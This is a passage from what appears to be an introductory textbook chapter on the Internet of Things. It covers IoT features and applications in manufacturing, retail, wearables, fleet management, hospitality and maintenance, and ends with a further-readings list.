IoT systems reduce the need for manual labor while increasing the efficiency of industrial production processes.

Public Utilities Administration
IoT systems can connect entire cities to reduce waste and improve access to public utilities.

Information Technology
With network data collected by embedded IoT devices, digital communication hardware and software can be managed and optimized.

Transportation and Traffic Management


3. The following are major IoT features:

 Connectivity: Establishing a proper connection between all IoT devices and the IoT platform, which could be a server or the cloud.

 Analyzing: After connecting all of the relevant things, it is time to analyze the data collected in real time and use it to build effective business intelligence.

 Integrating: IoT integrates various models to improve the user experience.

 Artificial Intelligence: IoT makes things smart and improves people’s lives by utilizing data.

 Sensing in IoT: In IoT technologies, sensor devices detect and measure environmental changes and report their status.

 Active Engagement: IoT allows connected technology, products, or services to engage actively with one another.

 Endpoint Management: Endpoint management is critical for all IoT systems; otherwise, the system will fail completely.

4. Some of the applications of IoT are as follows:

IoT Applications in Manufacturing

The world of manufacturing and industrial automation is another big winner in the IoT sweepstakes. RFID and GPS technology can help a manufacturer track a product from its start on the factory floor to its placement in the destination store, the whole supply chain from start to finish. These sensors can gather information on travel time, product condition, and environmental conditions that the product was subjected to.

Sensors attached to factory equipment can help identify bottlenecks in the production line, thereby reducing lost time and waste. Other sensors mounted on those same machines can also track the performance of the machine, predicting when the unit will require maintenance, thereby preventing costly breakdowns.

IoT Applications in Retail

IoT technology has a lot to offer the world of retail. Online and in-store sales figures, together with information gleaned from IoT sensors, can drive warehouse automation and robotics. Much of this relies on RFIDs, which are already in heavy use worldwide.

Mall locations are iffy things; business tends to fluctuate, and the advent of online shopping has driven down the demand for brick-and-mortar establishments. However, IoT can help analyze mall traffic so that stores located in malls can make the necessary adjustments that enhance the customer’s shopping experience while reducing overhead.

Speaking of customer engagement, IoT helps retailers target customers based on past purchases. Equipped with the information provided through IoT, a retailer could craft a personalized promotion for their loyal customers, thereby eliminating the need for costly mass-marketing promotions that don’t stand as much of a chance of success. Much of these promotions can be conducted through the customers’ smartphones, especially if they have an app for the appropriate store.

IoT Applications in Wearables

From medical to fitness to GPS tracking, wearables serve a wide range of purposes. These IoT devices have more than doubled in the last three years.

Fitness bands monitor calorie expenditure, distance covered, heartbeats per minute, blood oxygen level, and more. These devices mostly come in the form of wristbands/watches. However, they can also appear as earbuds, clip-on devices, or smart fabric.

Other wearables include virtual glasses and GPS tracking belts. These small and energy-efficient devices, equipped with sensors and software, collect and organize data about users. Top companies like Apple, Google, Fitbit, and Samsung are behind the introduction of such Internet of Things wearables.

IoT Applications in Fleet Management

The installation of IoT sensors in fleet vehicles has been a boon for geo-location, performance analysis, fuel savings, telemetry control, pollution reduction, and information to improve the driving of vehicles.

They help establish effective interconnectivity between the vehicles, managers, and drivers. They assure that both drivers and owners know all details about vehicle status, operation, and requirements. The introduction of real-time maintenance alarms helps remove the dependence on drivers for their detection.

IoT Applications in Hospitality

Interesting improvements to the service quality have found their way with the application of the IoT to the hotel industry. The hassle-free automation of various interactions, such as electronic keys sent directly to each guest's mobile devices, has brought about a transformation. It provides easy check-out processes, immediate information on the availability of rooms, and quicker assignment of housekeeping tasks, while disabling the operation of doors.

The guest’s location, sending offers on activities of interest, the realization of orders to the room, the automatic charge of accounts to the room, and more can easily be handled via integrated applications using IoT technology.

IoT Applications in Maintenance Management

Maintenance management is one of those areas where the application of IoT technology is most extensive. Sensors and software specialized in EAM/CMMS maintenance management provide a multifunctional tool applicable to many disciplines. It helps extend the functional life of physical assets, guaranteeing availability and reliability.

Real-time monitoring of physical assets enables the determination of instances when a measurement gets out of range and demands condition-based maintenance (CBM) or AI application to predict a failure.

12.12 FURTHER READINGS

1. Internet of Things, Jeeva Jose, Khanna Publishing, 2018.


2. Internet of Things - A Hands-on Approach, Arshdeep Bahga and Vijay
Madisetti, Universities Press, 2015.
3. IoT Fundamentals: Networking Technologies, Protocols and Use Cases
for the Internet of Things, Hanes David, Salgueiro Gonzalo, Grossetete
Patrick, Barton Rob, Henry Jerome, Pearson, 2017.
4. Designing the Internet of Things, Adrian Mcwen, Hakin Cassimally,
Wiley, 2015.
